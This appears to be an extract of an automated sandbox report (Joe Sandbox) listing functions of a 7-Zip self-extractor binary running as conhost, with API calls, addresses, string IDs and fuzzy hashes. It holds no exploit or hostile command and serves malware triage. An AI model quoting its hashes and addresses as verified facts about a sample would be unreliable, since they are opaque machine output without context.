                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4151135813-0
                                                                                                                                                                                                                                          • Opcode ID: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                                                                                                                                                                                                                          • Instruction ID: 672def9565bfc40134271a6b6781851c3b106654d45cfef20a52af227c3b9f34
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 101191B4202608EFE7215F52EE85EA7777CFB44745700843EF986A66A1CF396C10DA1D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004041F8
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?), ref: 00404236
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000), ref: 0040425C
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?), ref: 00404264
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID: %%T/$%%T\
                                                                                                                                                                                                                                          • API String ID: 613200358-2679640699
                                                                                                                                                                                                                                          • Opcode ID: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                                                                                                                                                                                                                          • Instruction ID: df8026740f1f86ca471eb2ea0e41fa98444a64685e80cf153ceacd7fb444c2e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D411C97190010AAACF05FFA2D856CEDBB78AF14708F10846AB551760E2DF789B95CB48
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004042B3
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004042F1
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000), ref: 00404317
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?), ref: 0040431F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID: %%S/$%%S\
                                                                                                                                                                                                                                          • API String ID: 613200358-358529586
                                                                                                                                                                                                                                          • Opcode ID: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                                                                                                                                                                                                                          • Instruction ID: 4488bc9e4ce621475e7ac020b16d4e8be87a05eb600b5e71f20f3fc481b48b4f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7811C975900109AACF05FFA2D856CEDBB78AF14308F10846AF561760E2DF789B99CB48
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 0040436E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004043AC
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000), ref: 004043D2
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?), ref: 004043DA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID: %%M/$%%M\
                                                                                                                                                                                                                                          • API String ID: 613200358-4143866494
                                                                                                                                                                                                                                          • Opcode ID: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                                                                                                                                                                                                                          • Instruction ID: 1e1ecd5a4810495ff1b5747c8ad1555e4ca49c286c4952b26a2a60c5b9476409
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D411C971900109AACF05FFA2D856CEDBB79AF14308F10846AF551760E2DF785A9ACB58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408519
                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00408532
                                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0040854E
                                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(00000000), ref: 00408578
                                                                                                                                                                                                                                            • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                                                                                                                                                                                                            • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                                                                                                                                                                          • String ID: A$A
                                                                                                                                                                                                                                          • API String ID: 1557639607-3025247501
                                                                                                                                                                                                                                          • Opcode ID: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                                                                                                                                                                                                                          • Instruction ID: 8e2b46382c4e0e79c38c40a6d9053323f47f27154f6d6a29afbbbbb9270b0dc0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41114FB1A00204ABCB10DB95DA48BDE77BCAB88701F1400AEE905E7281DB79DE04CB75
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(uxtheme,?,00409133,000004B1,00000000,?,?,?,?,?,00409240), ref: 00407DB4
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407DC5
                                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00407DDE
                                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00407DF4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$AddressLibraryLoadProc
                                                                                                                                                                                                                                          • String ID: SetWindowTheme$uxtheme
                                                                                                                                                                                                                                          • API String ID: 324724604-1369271589
                                                                                                                                                                                                                                          • Opcode ID: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
                                                                                                                                                                                                                                          • Instruction ID: 9b0de1ac587a4165001920f6b170f50534138ecb837747bbddd8b6d978bb5341
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0A732E4672533C232126A6C48FAB769CDF46B51B094136BD04F7390DFA8DC4041ED
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B866
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
                                                                                                                                                                                                                                          • memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@memmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3828600508-0
                                                                                                                                                                                                                                          • Opcode ID: ee812316e2d7e0eb845d54e134a37839a0ae42f25294d2bbf007d460a98e3d11
                                                                                                                                                                                                                                          • Instruction ID: 99a0ad40a844e9a3ffa9f049326f458531d7c56977f80c19912095adb51eb10a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee812316e2d7e0eb845d54e134a37839a0ae42f25294d2bbf007d460a98e3d11
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 284159B56003048FCB14DF19D880A57B7E9FF88304F14856EEC4A9B346D779E919CBAA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0041EA30,00000001,0041EA30,0041EA30,00000001,?,00000000), ref: 00405A1E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A80
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A98
                                                                                                                                                                                                                                            • Part of subcall function 004039E7: lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
                                                                                                                                                                                                                                            • Part of subcall function 004039E7: GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                                                                                                                                                                                                                            • Part of subcall function 004039E7: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                                                                                                                                                                                                                            • Part of subcall function 004039E7: ??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                                                                                                                                                                                          • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                                                                                                          • API String ID: 4038993085-372238525
                                                                                                                                                                                                                                          • Opcode ID: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                                                                                                                                                                                                                          • Instruction ID: 1d6f72d44ce7b26bafcc2ee4707833dd2b606594c716bb38fa5c6a696ed85d5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05311B7490022AAACF05EF92CD828EEBB79FF58318F10042BE810761E1DB795645DE58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wsprintf$ExitProcesslstrcat
                                                                                                                                                                                                                                          • String ID: 0x%p
                                                                                                                                                                                                                                          • API String ID: 2530384128-1745605757
                                                                                                                                                                                                                                          • Opcode ID: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
                                                                                                                                                                                                                                          • Instruction ID: 10afd36f4070d89f293b01a92875ce402ef2d19f58a346a7dbf4abb5c9f18492
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 531182B5801208EFCB20EFB5DD85DDA73B8AF04304F00447BE645B3191D778AA948B5A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402E98
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EA1
                                                                                                                                                                                                                                            • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                                                                                                                            • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402EB9
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402ED9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                                                                                                                                                                          • String ID: SetEnvironment
                                                                                                                                                                                                                                          • API String ID: 612612615-360490078
                                                                                                                                                                                                                                          • Opcode ID: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                                                                                                                                                                                                                          • Instruction ID: 9a1053b96c855abc576ef2a573940a7f22d1fb52882628247968529f0f67b02c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66015276900104BADB14AB95DD819EEB7BCEF48314F10416BFD01B21D1DB786A408A99
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0041E3F0,00000020,?,?,?,?,?,00406547,?,?), ref: 004049C2
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A74
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A7C
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A8B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A93
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$lstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2031685711-0
                                                                                                                                                                                                                                          • Opcode ID: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
                                                                                                                                                                                                                                          • Instruction ID: d6d6aeb9fd97b078be875a6c61f5694a486b541387e48e1a0363308d58f113ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E21E3B6E40205ABCF206FB5CC029EB77A8EF84355F10447BEE41B72D1E7784D858A99
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000B), ref: 004081F6
                                                                                                                                                                                                                                            • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000C), ref: 004081FF
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 0040883F
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00408850
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00408917
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MetricsSystem$??3@
                                                                                                                                                                                                                                          • String ID: 100%%
                                                                                                                                                                                                                                          • API String ID: 2562992111-568723177
                                                                                                                                                                                                                                          • Opcode ID: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                                                                                                                                                                                                                          • Instruction ID: c0f787396fa6b3de95c2f82887938995bcf82f961e42ceb6ace71c8d1a060617
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51318171A007059FCB24EF6ACA459AEB7F4EF54704B00052ED982A72D1DB78FE44CB99
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00406EB0,00000000,?,ExecuteFile,0040454C,00000000,00000000,00406EB0,?,waitall,00000000,00000000,?,?,0041E9E8), ref: 00404512
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,0041E9E8), ref: 0040451B
                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00404527
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$_wcsnicmp
                                                                                                                                                                                                                                          • String ID: ExecuteFile
                                                                                                                                                                                                                                          • API String ID: 2823567412-323923146
                                                                                                                                                                                                                                          • Opcode ID: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
                                                                                                                                                                                                                                          • Instruction ID: a2e0a5f2a3f105f817df911ac3b4dcd355adebb597ea1c4786e8ca368391ef02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
